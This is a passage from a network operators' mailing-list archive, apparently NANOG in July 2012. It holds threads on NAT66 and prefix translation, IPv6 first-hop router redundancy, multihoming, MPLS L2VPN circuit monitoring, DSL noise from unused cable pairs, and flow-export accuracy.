(Firewall B has no state table entry for the session). Owen From owen at delong.com Tue Jul 17 01:44:42 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 16 Jul 2012 23:44:42 -0700 Subject: using "reserved" IPv6 space In-Reply-To: References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> <1342502946.6281.164.camel@karl> Message-ID: On Jul 16, 2012, at 11:16 PM, Jimmy Hess wrote: > On 7/17/12, Karl Auer wrote: > [snip >> I'm not sure I follow the logic there. If the anycast router changes the >> packet will be resent to the new subnet anycast router eventually >> (assuming some layer cares enough about the packet to resend it). The >> "last known hardware address" doesn't matter any more or less in this >> scenario than it does in any other routing situation. > > The pertinent discussion is not about "any other routing situation"; > it's about first hop redundancy. > > The "last known hardware address" is in the NDP table, so the packet > retransmissions likely wind up in the same place NUD should actually take care of that. > Another problem is the subnet anycast address may find unwanted > routers that have to listen on it, including routers with only one > interface and incomplete routing info, and including some > unauthorized 5-port IPv6 router someone smuggled into the > building and plugged in somewhere. Yep. > By contrast, a real FHRP that implements failover either uses a > virtual hardware address, or a 'gratuitous arp' type mechanism, so > the packet retransmissions will go to the live failover partner. The whole concept of gratuitous arp is strictly IPv4. Owen From kauer at biplane.com.au Tue Jul 17 01:58:16 2012 From: kauer at biplane.com.au (Karl Auer) Date: Tue, 17 Jul 2012 16:58:16 +1000 Subject: using "reserved" IPv6 space In-Reply-To: References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> <1342502946.6281.164.camel@karl> Message-ID: <1342508296.6281.188.camel@karl> On Mon, 2012-07-16 at 23:44 -0700, Owen DeLong wrote: > The whole concept of gratuitous arp is strictly IPv4. Isn't an unsolicited neighbour advertisement pretty much the same thing? Regards, K. -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Karl Auer (kauer at biplane.com.au) http://www.biplane.com.au/kauer GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017 Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 230 bytes Desc: This is a digitally signed message part URL: From seth.mos at dds.nl Tue Jul 17 02:08:21 2012 From: seth.mos at dds.nl (Seth Mos) Date: Tue, 17 Jul 2012 09:08:21 +0200 Subject: using "reserved" IPv6 space In-Reply-To: References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> <50043CB8.20302@gmail.com> <161620.1342456488@turing-police.cc.vt.edu> <75C9CAAC-9162-4F1F-9E51-A7801FC3F1C8@dds.nl> Message-ID: <50050F65.5020103@dds.nl> Op 17-7-2012 8:43, Owen DeLong schreef: > > On Jul 16, 2012, at 10:36 PM, Seth Mos wrote: > >> Hi, >> >> Op 16 jul 2012, om 18:34 heeft valdis.kletnieks at vt.edu het volgende geschreven: >> To highlight what the current NAT66 is useful for, it's a RFC for Network Prefix translation. It has nothing do with obfuscation or hiding the network anymore. It's current application is multihoming for the poor. > > And it's a really poor way to do multihoming. > > You don't have to spend a lot of money to multihome properly. Did you see I mentioned poor? Poor as in unwilling to pay anything more then the cost for the 2 internet connections they already have. If you are a individual this likely applies. 3G stick anyone? If you are a business, see B for Business and B for BGP. Also, I hope Mobile Internet providers will be supporting DHCP6 and DHCP6-PD for hotspots. Another place where I can see cruft being made. On that note, the world of Mobile internet providers seems to be full of assumptions about the use of the devices and connection. It can probably never be saved anymore. If there ever was a mobile network that not respected the users/clients interests this would be it. >> Example: >> You have a Cable and a DSL, they both provide IPv6 and you want to provide failover. You then use ULA or one of the Global Addresses on the LAN network, and set up NAT66 mappings for the secondary WAN, or both if you are using ULA. > > I have that and I use BGP with an ARIN prefix using the Cable and DSL as layer 2 substrates for dual-stack tunnels. So can any user just send them an email "Hey, I dual home, can I have a /48 please?". That's not even considering that I need to terminate the prefix on a BGP router somewhere that someone surely wants money for. > Works pretty well and doesn't cost much more than the NAT66 based solution. It's in your words "doesn't cost much more" which translates to "too much", we're all cheapskates :-) > Once you go to tunnels, why not go all the way and put BGP across the tunnels? Because by using 2 tunnels from 2 different providers you actually hope to increase redundancy, we are not talking 2 Hurricane Electric tunnels here. It's one /48 from HE.net and another /48 Sixxs. I've had a bit too much the past few months where a number of the HE.net tunnelbrokers have been the target for a DDoS attack. Nothing I can blame HE.net for, but it does illustrate my point that having 2 different "upstream" (tunnel) providers work best. Regards, Seth From kauer at biplane.com.au Tue Jul 17 02:15:00 2012 From: kauer at biplane.com.au (Karl Auer) Date: Tue, 17 Jul 2012 17:15:00 +1000 Subject: using "reserved" IPv6 space In-Reply-To: <894EB7FC-A18C-41BA-A778-85564632FC8E@delong.com> References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> <894EB7FC-A18C-41BA-A778-85564632FC8E@delong.com> Message-ID: <1342509300.6281.198.camel@karl> On Mon, 2012-07-16 at 23:36 -0700, Owen DeLong wrote: > Reread the spec... [the subnet router anycast address] gets the packet > to one or more of the routers and it may well lead to packet > duplication. There may or may not be coordination between the > routers. It isn't in the spec. Which spec? Looking at RFC 4291, Section 2.6.1: Packets sent to the Subnet-Router anycast address will be delivered to one router on the subnet. All routers are required to support the Subnet-Router anycast addresses for the subnets to which they have interfaces. The Subnet-Router anycast address is intended to be used for applications where a node needs to communicate with any one of the set of routers. But I do not have an encylopaedic knowledge of all the RFCs, so perhaps this has been superseded, obsoleted or updated... Reading it with a squint: The phrase "packets [...] will be delivered to one router on the subnet" does not specifically exclude the possibility that packets will be delivered to more than one router on the subnet. Still, I do think it would be a little unreasonable to interpret it thus. Regards, K. -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Karl Auer (kauer at biplane.com.au) http://www.biplane.com.au/kauer GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017 Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 230 bytes Desc: This is a digitally signed message part URL: From ler762 at gmail.com Tue Jul 17 02:25:00 2012 From: ler762 at gmail.com (Lee) Date: Tue, 17 Jul 2012 03:25:00 -0400 Subject: NAT66 was Re: using "reserved" IPv6 space In-Reply-To: <20120717024040.7A074228E3B4@drugs.dv.isc.org> References: <20120717024040.7A074228E3B4@drugs.dv.isc.org> Message-ID: On 7/16/12, Mark Andrews wrote: > > In message > , Lee > writes: >> On 7/16/12, Owen DeLong wrote: >> > >> > Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is >> > being >> > able to eliminate NAT. NAT was a necessary evil for IPv4 address >> > conservation. It has no good use in IPv6. >> >> NAT is good for getting the return traffic to the right firewall. How >> else do you deal with multiple firewalls & asymmetric routing? > > Traffic goes where the routing protocols direct it. NAT doesn't > help this and may actually hinder as the source address cannot be > used internally to direct traffic to the correct egress point. _source_ address + 'used internally'?? I like policy based routing about as much as the more opinionated members of this list like NAT :) > Instead you need internal routers that have to try to track traffic > flows rather than making simple decisions based on source and > destination addresess. > > Applications that use multiple connections may not always end up > with consistent external source addresses. In the general case, sure. At work, the only time your external source address changes is when something quits working and you're automatically failed over to the working firewall (ha pair). >> Yes, it's possible to get traffic back to the right place without NAT. >> But is it as easy as just NATing the outbound traffic at the >> firewall? > > It can be and it can be easier to debug without NAT mangling > addresses. Yes, there are times when NAT isn't the appropriate solution. I'm not religious about it.. just saying there's times when NAT is the simplest/easiest solution. Regards, Lee From ler762 at gmail.com Tue Jul 17 02:33:13 2012 From: ler762 at gmail.com (Lee) Date: Tue, 17 Jul 2012 03:33:13 -0400 Subject: NAT66 was Re: using "reserved" IPv6 space In-Reply-To: References: <20120717024040.7A074228E3B4@drugs.dv.isc.org> Message-ID: On 7/16/12, Grant Ridder wrote: > If you are running an HA pair, why would you care which box it went back > through? You wouldn't. But if you've got an HA pair at site A and another HA pair at site B.. Lee > > -Grant > > On Monday, July 16, 2012, Mark Andrews wrote: > >> >> In message > squUmZofs3_-yriHY8o4Gt3W9+x6fVUQ at mail.gmail.com >, Lee >> writes: >> > On 7/16/12, Owen DeLong > wrote: >> > > >> > > Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is >> being >> > > able to eliminate NAT. NAT was a necessary evil for IPv4 address >> > > conservation. It has no good use in IPv6. >> > >> > NAT is good for getting the return traffic to the right firewall. How >> > else do you deal with multiple firewalls & asymmetric routing? >> >> Traffic goes where the routing protocols direct it. NAT doesn't >> help this and may actually hinder as the source address cannot be >> used internally to direct traffic to the correct egress point. >> >> Instead you need internal routers that have to try to track traffic >> flows rather than making simple decisions based on source and >> destination addresess. >> >> Applications that use multiple connections may not always end up >> with consistent external source addresses. >> >> > Yes, it's possible to get traffic back to the right place without NAT. >> > But is it as easy as just NATing the outbound traffic at the >> > firewall? >> >> It can be and it can be easier to debug without NAT mangling >> addresses. >> >> The only thing helpful NAT66 does is delay the externally visible >> source address selection until the packet passes the NAT66 box. >> >> Mark >> -- >> Mark Andrews, ISC >> 1 Seymour St., Dundas Valley, NSW 2117, Australia >> PHONE: +61 2 9871 4742 INTERNET: >> marka at isc.org >> >> > From peterehiwe at gmail.com Tue Jul 17 05:14:01 2012 From: peterehiwe at gmail.com (Peter Ehiwe) Date: Tue, 17 Jul 2012 11:14:01 +0100 Subject: MPLS L2VPN monitoring Message-ID: Hello , For those who provide l2vpn services to customers over MPLS , what kind of tools do you use for monitoring the circuits and what kind of values do you proactively monitor I have tools in place to monitor these circuits but i want to know based on group members experiences in order to improve my monitoring platform for this circuits. Thanks a lot! From me at anuragbhatia.com Tue Jul 17 05:18:43 2012 From: me at anuragbhatia.com (Anurag Bhatia) Date: Tue, 17 Jul 2012 15:48:43 +0530 Subject: Managing free pairs to prevent DSL sync. loss Message-ID: Hello everyone. I am having some very bad time due to my ISP's poor last mile (in India). DSL is loosing sync. consistently and this time problem seems quite interesting so I though to ask how ISPs across world managing it. Problem is high attenuation & low SNR because of "lot of free pairs" in the cable. My connection is coming from something like 100 pair > 50 pair > 20 pair > 5 pair. Now 100 pair has less then 30 active lines but based on testing it seems like at 100 pair DP there's very low noise and everything is pretty good (usual BSNL pillars in India have 100 pair terminations). Next 20 pair has just 4 active lines (and 16 free lines causing issues for those 4 working lines) and at the end my line comes from 20 > 5 with only one (which is my) line active on one of 5 pairs. Now argument of my ISP (BSNL) is that due to excessive number of free pairs, they are causing huge noise and they likely need to reduce these DP's by putting 1-2 line wire from my home till 100 pair pillar termination (which is down in other street and so needs effort in digging and putting new wire). But I just never heard about this problem anywhere else. Do DSL providers really suffer due to free pairs? Assuming other pairs are all crossed/shorted, can they still produce significant noise in other working lines? Also, what exactly was "bonding" used by AT&T in US? I thought it was actually making use of free pairs, bonding them together and having more bandwidth for end user, isn't it? If someone can pass me some detailed whitepaper or document explaining about this noise, it will be very much helpful. Thanks. -- Anurag Bhatia Web: anuragbhatia.com Skype: anuragbhatia.com Linkedin | Twitter| Google+ From matt.addison at lists.evilgeni.us Tue Jul 17 06:18:28 2012 From: matt.addison at lists.evilgeni.us (Matt Addison) Date: Tue, 17 Jul 2012 07:18:28 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <1342509300.6281.198.camel@karl> References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> <894EB7FC-A18C-41BA-A778-85564632FC8E@delong.com> <1342509300.6281.198.camel@karl> Message-ID: <6476010549005627514@unknownmsgid> On Jul 17, 2012, at 3:15, Karl Auer wrote: > Reading it with a squint: The phrase "packets [...] will be delivered to > one router on the subnet" does not specifically exclude the possibility > that packets will be delivered to more than one router on the subnet. > Still, I do think it would be a little unreasonable to interpret it > thus. After reading some more I see how using subnet-router anycast works. The anycast address is global in scope so the end host will only learn 1 potential next hop at a time (the routers randomize a delay when responding to ND for a subnet-router anycast), and perform NUD as needed to determine if their current router is up or down (RFC4861). So you can get failover with no FHRP by using subnet-router anycast. You just won't get sub-second failover. From sergey at lobanov.in Tue Jul 17 06:35:42 2012 From: sergey at lobanov.in (Sergey V. Lobanov) Date: Tue, 17 Jul 2012 15:35:42 +0400 Subject: MPLS L2VPN monitoring In-Reply-To: References: Message-ID: <50054E0E.1000606@lobanov.in> Hello, For example, cpwVcOperStatus for Cisco devices. Look at proprietary mibs On 07/17/2012 02:14 PM, Peter Ehiwe wrote: > Hello , > > For those who provide l2vpn services to customers over MPLS , what > kind of tools do you use for monitoring the circuits and what kind of > values do you proactively monitor > > I have tools in place to monitor these circuits but i want to know > based on group members experiences in order to improve my monitoring > platform for this circuits. > > Thanks a lot! > -- wbr, Sergey V. Lobanov E-mail: sergey at lobanov.in Timezone: MSK(GMT+4) From bhmccie at gmail.com Tue Jul 17 07:03:38 2012 From: bhmccie at gmail.com (-Hammer-) Date: Tue, 17 Jul 2012 07:03:38 -0500 Subject: NAT66 was Re: using "reserved" IPv6 space In-Reply-To: References: Message-ID: <5005549A.6030407@gmail.com> I have almost one hundred FWs. Some physical. Some virtual. Various vendors. Your point is spot on. -Hammer- "I was a normal American nerd" -Jack Herer On 7/16/2012 8:55 PM, Lee wrote: > On 7/16/12, Owen DeLong wrote: >> Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being >> able to eliminate NAT. NAT was a necessary evil for IPv4 address >> conservation. It has no good use in IPv6. > NAT is good for getting the return traffic to the right firewall. How > else do you deal with multiple firewalls & asymmetric routing? > > Yes, it's possible to get traffic back to the right place without NAT. > But is it as easy as just NATing the outbound traffic at the > firewall? > > Lee > > From bhmccie at gmail.com Tue Jul 17 07:27:45 2012 From: bhmccie at gmail.com (-Hammer-) Date: Tue, 17 Jul 2012 07:27:45 -0500 Subject: using "reserved" IPv6 space In-Reply-To: References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> Message-ID: <50055A41.2020005@gmail.com> -Hammer- "I was a normal American nerd" -Jack Herer On 7/16/2012 11:18 PM, Jimmy Hess wrote: > On 7/16/12, -Hammer- wrote: >> hurdles. Example? HSRP IPv6 global addressing on Cisco ASR platform. If > HSRP is a legacy proprietary protocol; try VRRP. Stateless > autoconfig and router advertisements can obviate (eliminate/reduce) > the need in many cases; albeit, with a longer failure recovery > duration. This isn't PAGP vs LACP again is it? Can someone show me a sunset document for HSRP from Cisco? Yes, VRRP, I use it as well. But that's not the point. The point is that it's a feature from a vendor that lacks parity across the product suites. Like most of the folks out there, I run IOS, NX-OS, IOS-XE, etc and that's just from Cisco. Feature parity is a big gripe that doesn't have an easy solution. I feel for the vendors but at the same time I'm frustrated when I read a document on a function and realize afterwards I can only deploy it on "some" of my up to date products. That's the point. >> this morning from CheckPoint for NAT66. This should have been ready for >> prime time years ago. I guess the vendors weren't getting the push from > NAT66; you're talking about something that is not a mainline feature, > an experimental proposition; RFC6296 produced in 2011. Very few > IPv6 deployments should require prefix translation or any kind of NAT > technology with IPv6, other than the IPv4 transition technologies. > > So... NO.. they should not have had this ready "for prime time" years ago. I disagree. I was asking security vendors what they were doing about these kinds of future needs years ago. Many years ago. They all conceded that they had had similar requests from other customers but the demand wasn't there yet. They should have had more vision on their road maps but they focused on basic functionality of the protocol and not features beyond that and now they are playing catch up. I understand, they were focused on what features were getting the attention. That's business. But everyone knew the depletion rates and everyone knew that whether the pompous USA wanted it or not IPv6 was coming in the late 2000s and early 2010s. So they should have been more diligent. You can pull up any marketing document from any vendor and they will tell you IPv6 is fully supported. But when you implement features (who the heck runs a default config these days?) you really test the functionality of the product. > There are other things they should have been working on, such as > getting the base IPv6 implementation correct, V6 connectivity, > V6-enabled protocols, support for the newer RA/DHCPv6 options, and > support for the newer more fully baked IPv4 transition specs such as > 6to4, NAT-PT, and bugfixing. > > I'll take the stable platform, that has the standards-specified > features, over one with bells and whistles, and the latest > experimental draft features such as 6to6, that are not required to > deploy IPv6, thanks. I agree. Stability. But a stable platform that doesn't have the features I need is not a stable platform I can invest in. Cart before horse. > -- > -JH > From saku at ytti.fi Tue Jul 17 07:47:13 2012 From: saku at ytti.fi (Saku Ytti) Date: Tue, 17 Jul 2012 15:47:13 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <50055A41.2020005@gmail.com> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <50055A41.2020005@gmail.com> Message-ID: <20120717124713.GA10157@pob.ytti.fi> I wonder who really believes there is no usage case for NAT66. Have these people seen non-trivial corporate networks? I'm sure many people in this list finance part of their lives with renumber projects costing MUSDs. For many companies just finding out where addresses have been punched in (your FWs, your software, partner FWs, partner software, configurations...) will take months, before even starting renumbering. If my enterprise customers don't have plan and ask my advice, I will recommend own PI, if they don't want (extra cost, extra clue needed) ULA and NAT66. If I recommend more specific from our PA, I know when they switch operators in few years time, some of them will decide renumbering is out-of-the-question[0] and will NAT my PA to new operator PA, essentially forcing me to never return any addresses to my free pool. I wonder if that is valid reason to ask more allocations? That address was once used? More specific from our PA is fine for small offices with trivial setup, residential networks and few niche shops who specifically design for renumbering (but I guess these most often already want PI+BGP) [0] I don't want NAT66 anywhere. I won't use NAT66 anywhere. But just because we have new protocol, does not mean we have new set of people, who share my ideologies and goals about network design. Only thing I can do, is protect myself from problems they would cause me. -- ++ytti From bhmccie at gmail.com Tue Jul 17 07:53:04 2012 From: bhmccie at gmail.com (-Hammer-) Date: Tue, 17 Jul 2012 07:53:04 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120717124713.GA10157@pob.ytti.fi> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <50055A41.2020005@gmail.com> <20120717124713.GA10157@pob.ytti.fi> Message-ID: <50056030.4060002@gmail.com> There's are routing and switching people and there are security people. And they look at things different. That, IMHO, is the root of the emotion on this thread. No one is actually wrong except me for stirring the pot as the OP. :) -Hammer- "I was a normal American nerd" -Jack Herer On 7/17/2012 7:47 AM, Saku Ytti wrote: > I wonder who really believes there is no usage case for NAT66. Have these > people seen non-trivial corporate networks? > > I'm sure many people in this list finance part of their lives with renumber > projects costing MUSDs. For many companies just finding out where addresses > have been punched in (your FWs, your software, partner FWs, partner > software, configurations...) will take months, before even starting > renumbering. > > If my enterprise customers don't have plan and ask my advice, I will > recommend own PI, if they don't want (extra cost, extra clue needed) ULA > and NAT66. If I recommend more specific from our PA, I know when they > switch operators in few years time, some of them will decide renumbering is > out-of-the-question[0] and will NAT my PA to new operator PA, essentially > forcing me to never return any addresses to my free pool. I wonder if that > is valid reason to ask more allocations? That address was once used? > > More specific from our PA is fine for small offices with trivial setup, > residential networks and few niche shops who specifically design for > renumbering (but I guess these most often already want PI+BGP) > > [0] I don't want NAT66 anywhere. I won't use NAT66 anywhere. But just > because we have new protocol, does not mean we have new set of people, who > share my ideologies and goals about network design. Only thing I can do, is > protect myself from problems they would cause me. > From rps at maine.edu Tue Jul 17 08:06:15 2012 From: rps at maine.edu (Ray Soucy) Date: Tue, 17 Jul 2012 09:06:15 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <50055A41.2020005@gmail.com> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <50055A41.2020005@gmail.com> Message-ID: With all due respect to Owen, I don't share the view that everyone should be jumping into BGP or getting an allocation from ARIN, but that's been a long-standing debate between us. NPT allows you to get prefixes from multiple ISPs without having to get an allocation to coordinate routing; or in the other example, without having to have host systems maintain multiple global prefixes (which quickly becomes a security nightmare for auditing; a troubleshooting nightmare for support, etc). As far as it being costly, I think too much of the mindset on list is the large network or ISP perspective; for the small network that NPT is targeting, all this would happen in some "Dual WAN" multi-function firewall appliance. Modern hardware is often powerful enough to vastly exceed transport capacity for these networks, so the performance "cost" is a non-issue. All these other methods place far too much control on the host system (and its implementation) to be ready for prime time yet; the reality is that without NPT being widely available, we won't see 99% of small businesses using IPv6 for a long time, so if our goal is IPv6 adoption maybe it's time we stop the holy war on anything "NAT". Hammer has echoed legitimate concerns and confusion that represents a very large portion of the user base out there. Maybe we should be asking why that is instead of telling him he doesn't understand anything and that NAT is "evil". -- Ray Soucy Epic Communications Specialist Phone: +1 (207) 561-3526 Networkmaine, a Unit of the University of Maine System http://www.networkmaine.net/ From Dave.Siegel at level3.com Tue Jul 17 08:56:12 2012 From: Dave.Siegel at level3.com (Siegel, David) Date: Tue, 17 Jul 2012 13:56:12 +0000 Subject: MPLS L2VPN monitoring In-Reply-To: References: Message-ID: <72A2F9AF18EC024C962A748EA6CF75B90EC2CDE0@W8USSFJ204.ams.gblxint.com> We deploy NIDs to the customer premise. You just can't get enough alarm data be looking only at your router/switch on your side of an Ethernet NNI to give you a proper indication of whether the service is functional, and it also happens to be quite handy to have when a performance test/verification is required. There are a variety of vendors out there to choose from...we have quite a lot of Tellabs and Accedian out in the field. I had hoped that last mile vendors would have been providing NIDs "smartjack" style by now in a fairly ubiquitous fashion, but alas none of them have stepped up to the plate so we're still putting them out there on our own dime. Dave -----Original Message----- From: Peter Ehiwe [mailto:peterehiwe at gmail.com] Sent: Tuesday, July 17, 2012 4:14 AM To: North American Network Operators' Group Subject: MPLS L2VPN monitoring Hello , For those who provide l2vpn services to customers over MPLS , what kind of tools do you use for monitoring the circuits and what kind of values do you proactively monitor I have tools in place to monitor these circuits but i want to know based on group members experiences in order to improve my monitoring platform for this circuits. Thanks a lot! From johns at sstar.com Tue Jul 17 09:15:59 2012 From: johns at sstar.com (John Souvestre) Date: Tue, 17 Jul 2012 09:15:59 -0500 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: References: Message-ID: <011601cd6426$b35fb060$1a1f1120$@sstar.com> Hello Anurag. I have not heard of this problem before, but I imagine that the non-terminated pairs could be acting like antennas and picking up noise. Have you considered grounding one end (or both) of the free pairs? Perhaps this would reduce the amount of noise they pick up. Regards, John ??? John Souvestre - New Orleans LA - (504) 454-0899 -----Original Message----- From: Anurag Bhatia [mailto:me at anuragbhatia.com] Sent: Tuesday, July 17, 2012 5:19 am To: NANOG Mailing List Subject: Managing free pairs to prevent DSL sync. loss Hello everyone. I am having some very bad time due to my ISP's poor last mile (in India). DSL is loosing sync. consistently and this time problem seems quite interesting so I though to ask how ISPs across world managing it. Problem is high attenuation & low SNR because of "lot of free pairs" in the cable. My connection is coming from something like 100 pair > 50 pair > 20 pair > 5 pair. Now 100 pair has less then 30 active lines but based on testing it seems like at 100 pair DP there's very low noise and everything is pretty good (usual BSNL pillars in India have 100 pair terminations). Next 20 pair has just 4 active lines (and 16 free lines causing issues for those 4 working lines) and at the end my line comes from 20 > 5 with only one (which is my) line active on one of 5 pairs. Now argument of my ISP (BSNL) is that due to excessive number of free pairs, they are causing huge noise and they likely need to reduce these DP's by putting 1-2 line wire from my home till 100 pair pillar termination (which is down in other street and so needs effort in digging and putting new wire). But I just never heard about this problem anywhere else. Do DSL providers really suffer due to free pairs? Assuming other pairs are all crossed/shorted, can they still produce significant noise in other working lines? Also, what exactly was "bonding" used by AT&T in US? I thought it was actually making use of free pairs, bonding them together and having more bandwidth for end user, isn't it? If someone can pass me some detailed whitepaper or document explaining about this noise, it will be very much helpful. Thanks. -- Anurag Bhatia Web: anuragbhatia.com Skype: anuragbhatia.com Linkedin | Twitter| Google+ From valdis.kletnieks at vt.edu Tue Jul 17 09:59:49 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 17 Jul 2012 10:59:49 -0400 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: Your message of "Tue, 17 Jul 2012 09:15:59 -0500." <011601cd6426$b35fb060$1a1f1120$@sstar.com> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> Message-ID: <24359.1342537189@turing-police.cc.vt.edu> On Tue, 17 Jul 2012 09:15:59 -0500, "John Souvestre" said: > Have you considered grounding one end (or both) of the free pairs? Perhaps > this would reduce the amount of noise they pick up. Grounding both ends will probably result in "hilarity ensues". And I suspect that Anurag can't ground the free pairs, because the copper belongs to the provider. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From MatlockK at exempla.org Tue Jul 17 10:13:33 2012 From: MatlockK at exempla.org (Matlock, Kenneth L) Date: Tue, 17 Jul 2012 09:13:33 -0600 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: <24359.1342537189@turing-police.cc.vt.edu> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> <24359.1342537189@turing-police.cc.vt.edu> Message-ID: <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> Yeah, grounding both ends will result in some current traversing across the pairs all the time because of differences in ground potential over long-ish distances. Ken Matlock Network Analyst 303-467-4671 matlockk at exempla.org -----Original Message----- From: valdis.kletnieks at vt.edu [mailto:valdis.kletnieks at vt.edu] Sent: Tuesday, July 17, 2012 9:00 AM To: John Souvestre Cc: 'NANOG Mailing List' Subject: Re: Managing free pairs to prevent DSL sync. loss On Tue, 17 Jul 2012 09:15:59 -0500, "John Souvestre" said: > Have you considered grounding one end (or both) of the free pairs? > Perhaps this would reduce the amount of noise they pick up. Grounding both ends will probably result in "hilarity ensues". And I suspect that Anurag can't ground the free pairs, because the copper belongs to the provider. *** SCLHS Confidentiality Notice *** The information contained in this message may be privileged and confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any other dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify me immediately by replying to the message and deleting it from your computer. Thank you. *** SCLHS Confidentiality Notice *** From johns at sstar.com Tue Jul 17 10:16:17 2012 From: johns at sstar.com (John Souvestre) Date: Tue, 17 Jul 2012 10:16:17 -0500 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> <24359.1342537189@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> Message-ID: <015701cd642f$1f9bd800$5ed38800$@sstar.com> Yes, but would this result in more or less noise than an open end acting like an antenna? And would the ground loop noise be in the DSL spectrum? John ??? John Souvestre - New Orleans LA - (504) 454-0899 -----Original Message----- From: Matlock, Kenneth L [mailto:MatlockK at exempla.org] Sent: Tuesday, July 17, 2012 10:14 am To: valdis.kletnieks at vt.edu; John Souvestre Cc: NANOG Mailing List Subject: RE: Managing free pairs to prevent DSL sync. loss Yeah, grounding both ends will result in some current traversing across the pairs all the time because of differences in ground potential over long-ish distances. Ken Matlock Network Analyst 303-467-4671 matlockk at exempla.org -----Original Message----- From: valdis.kletnieks at vt.edu [mailto:valdis.kletnieks at vt.edu] Sent: Tuesday, July 17, 2012 9:00 AM To: John Souvestre Cc: 'NANOG Mailing List' Subject: Re: Managing free pairs to prevent DSL sync. loss On Tue, 17 Jul 2012 09:15:59 -0500, "John Souvestre" said: > Have you considered grounding one end (or both) of the free pairs? > Perhaps this would reduce the amount of noise they pick up. Grounding both ends will probably result in "hilarity ensues". And I suspect that Anurag can't ground the free pairs, because the copper belongs to the provider. *** SCLHS Confidentiality Notice *** The information contained in this message may be privileged and confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any other dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify me immediately by replying to the message and deleting it from your computer. Thank you. *** SCLHS Confidentiality Notice *** From simon.leinen at switch.ch Tue Jul 17 10:32:45 2012 From: simon.leinen at switch.ch (Simon Leinen) Date: Tue, 17 Jul 2012 17:32:45 +0200 Subject: Real world sflow vs netflow? In-Reply-To: (James Braunegg's message of "Mon, 16 Jul 2012 22:01:14 +0000") References: <50012E21.4060802@bromirski.net> <50032DA2.9020108@foobar.org> Message-ID: James Braunegg writes: > In the end I did real life testing comparing each platform Great, thanks for sharing your results! (It would be nice if you could tell us a little bit about the configuration, i.e. what kind of sampling you used.) [...] > That being said both netflow and sflow both under read by about 3% > when compared to snmp port counters, which we put to the conclusion > was broadcast traffic etc which the routers didn't see / flow. That's one reason, but another reason would be that at least in Netflow (but sFlow may be similar depending on how you use it), the reported byte counts only include the sizes of the "L3" packets, i.e. starting at the IP header, while the SNMP interface counters (ifInOctets etc.) include L2 overhead such as Ethernet frame headers and such. -- Simon. From valdis.kletnieks at vt.edu Tue Jul 17 10:38:20 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 17 Jul 2012 11:38:20 -0400 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: Your message of "Tue, 17 Jul 2012 10:16:17 -0500." <015701cd642f$1f9bd800$5ed38800$@sstar.com> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> <24359.1342537189@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> <015701cd642f$1f9bd800$5ed38800$@sstar.com> Message-ID: <79774.1342539500@turing-police.cc.vt.edu> On Tue, 17 Jul 2012 10:16:17 -0500, "John Souvestre" said: > Yes, but would this result in more or less noise than an open end acting > like an antenna? And would the ground loop noise be in the DSL spectrum? No, it will be strictly a DC current, with the amperage easily calculated from the voltage difference between the two ends and the resistance of however many cable-feet of wire is involved. Not usually a big deal, unless your termination design didn't include the ability to sink a DC current 24/7. (Of course, actually 